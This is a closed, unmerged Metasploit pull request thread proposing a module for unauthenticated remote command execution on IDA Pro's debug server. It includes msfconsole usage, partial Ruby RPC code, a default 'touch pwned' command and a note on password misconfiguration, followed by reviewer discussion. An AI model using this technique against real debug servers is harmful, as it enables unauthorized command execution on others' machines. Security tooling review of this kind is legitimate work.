### PR TITLE
New Module: RCE on IDA Pro debug server

### PR DESCRIPTION
**Pull request by PatrickTheElder**
By default the server component of the HexRays IDA PRO debugger binds to all interfaces and has no password set.
This module gives us RCE.

IDA PRO is not the most popular software, but this module could be fun at CTF competitions.

## Verification
Should work on all versions. 
Tested: 6.6, 6.8, 6.9, Linux & Windows.

./msfconsole
use auxiliary/admin/idapro/idapro_dbgsrv_exec
msf auxiliary(idapro_dbgsrv_exec) > set RHOST 192.168.148.140
msf auxiliary(idapro_dbgsrv_exec) > set CMD /usr/bin/touch pwned
msf auxiliary(idapro_dbgsrv_exec) > run

File "pwned" is created on remote system

### CODE REVIEW

**Comment by h00die** [comment]
If this is an RCE, why not make it an exploit module and pop a shell?

**Comment by h00die** [comment]
Please also add documentation see https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation

File: modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb [hunk 1]
```diff
@@ -0,0 +1,101 @@
...
+    data = sock.recv(length)
+    if datastore['VERBOSE']
+      print_status("Received RPC code: #{rpc_code}, data: #{Rex::Text.hexify(data)}")
+    end
+    return rpc_code, data
+  end
+
+  def send_rpc_packet(rpc_code, data)
+    if datastore['VERBOSE']
+      print_status("Sending RPC code: #{rpc_code}, data: #{Rex::Text.hexify(data)}")
```
Comment (cbrnrd) [inline modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb]: here as well

File: modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb [hunk 2]
```diff
@@ -0,0 +1,101 @@
...
+
+  def receive_rpc_packet
+    length = sock.recv(4).unpack('N')[0].to_i
+    if datastore['VERBOSE']
+      print_status("packet length: #{length}")
+    end
+    rpc_code = sock.recv(1).ord
+    data = sock.recv(length)
+    if datastore['VERBOSE']
+      print_status("Received RPC code: #{rpc_code}, data: #{Rex::Text.hexify(data)}")
```
Comment (cbrnrd) [inline modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb]: same as above

File: modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb [hunk 3]
```diff
@@ -0,0 +1,101 @@
...
+            Opt::RPORT(23946),
+            OptString.new('CMD', [false, 'The OS command to execute', '/usr/bin/touch pwned']),
+            OptString.new('PASSWORD', [false, 'password', '']),
+        ])
+  end
+
+  def receive_rpc_packet
+    length = sock.recv(4).unpack('N')[0].to_i
+    if datastore['VERBOSE']
+      print_status("packet length: #{length}")
```
Comment (cbrnrd) [inline modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb]: `vprint_status` and no check

**Comment by cbrnrd** [comment]
@h00die I could work on making this use cmdstager and turn it into an exploit. @PatrickHarsdorf would this be okay with you?

File: modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb [hunk 4]
```diff
@@ -0,0 +1,101 @@
...
+This can be abused for arbitrary command execution.
+BTW: even people explictily trying to set a password often get it wrong:
+server -Ppasswd  # password set
+server -P passwd  # oops, empty password!
+                      },
+                      'Author' => ['Patrick Harsdorf'],
+                      'License' => MSF_LICENSE,
+                      'References' =>
+                          [
+                          ],
```
Comment (cbrnrd) [inline modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb]: if there are no references please remove the section

File: modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb [hunk 5]
```diff
@@ -0,0 +1,101 @@
...
+                      'DisclosureDate' => ''))
```
Comment (cbrnrd) [inline modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb]: if there isn't a disclosure date please remove it

**Review by cbrnrd — CHANGES_REQUESTED** [review]
Just a few minor things

File: modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb (hunk 1 above)
Comment (PatrickHarsdorf) [inline modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb]: @cbrnrd Thanks, that would be great. I won´t be at my dev machine for a few days anyway.

**Comment by cbrnrd** [comment]
@PatrickHarsdorf Whipped something up [here](https://gist.github.com/cbrnrd/c16fd8096cb072f80b7d0bb8bcb55edc). Mind testing it when you get a chance?

**Comment by PatrickHarsdorf** [comment]
@cbrnrd: Thanks. I had to change a few things, but got it to work. Works on Linux, fails on Windows10 for reasons I have not full explored but seem unrelated to code of either of us (vbs file does not get created because %TEMP% does not get expanded?).

I would prefer to go back to the original RCE. It´s simpler and does not rely on other potentially brittle stuff. Also works it works OSX and other platforms not supported by cmdstager.

**Comment by wwebb-r7** [comment]
Thanks for the submission.  After review, we've decided that we can't see any real-world use case for this.  For one, I've personally never encountered anyone running the debug server on a machine or VM exposed on an outward facing interface.  Secondly, I've screwed up with the password parameter myself in the past.  When that happens, I immediately kill the server and start over.  I can't imagine why anyone else's workflow would be any different.  Finally, Hexrays is fully aware of this (as are most end users of any debugging server I'd assume) and have been since the product was branded by DataRescue.  The fact that they've done nothing to mitigate it would seem to echo the sentiment that it's not a security issue.  Personally, I can't see this as being fun for anyone at a CTF, be it module users spending untold time trying to get a shell with it, or any potential targets unlucky and naive enough to fall victim to it.

Closing.  If you feel this is in error, let us know.

**Pull request closed without merging**